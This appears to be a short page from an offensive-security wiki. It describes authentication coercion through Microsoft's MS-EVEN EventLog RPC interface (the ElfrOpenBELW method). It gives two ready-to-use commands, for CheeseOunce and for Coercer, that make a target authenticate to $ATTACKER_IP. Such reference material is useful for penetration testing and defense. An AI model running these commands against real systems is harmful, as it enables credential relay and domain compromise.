MS-EVEN abuse (CheeseOunce)

Theory

MS-EVEN is Microsoft's EventLog Remoting Protocol. It provides an RPC interface for reading events in both live and backup event logs on remote computers. That interface is available through \PIPE\eventlog SMB named pipe.

We can abuse this protocol to coerce authentications. Similarly to other MS-RPC abuses, this works by using a specific method relying on remote address. In this case, the ElfrOpenBELW method was detected vulnerable.

Practice

CheeseOunce

The following Python proof-of-concept (https://github.com/evilashz/CheeseOunce) implements the ElfrOpenBELW method.

python cheese.py $DOMAIN/$USER:$PASSWORD@$TARGET_IP $ATTACKER_IP

Coercer

Another alternative is to use the Coercer tool (python) as follow.

coercer coerce -u $USER -p $PASSWORD -d $DOMAIN --filter-protocol-name MS-EVEN -l $ATTACKER_IP -t $TARGET_IP

Resources

[MS-EVEN]: EventLog Remoting ProtocolMicrosoftLearn

GitHub - evilashz/CheeseOunce: Coerce Windows machines auth via MS-EVENGitHub

Last updated 7 months ago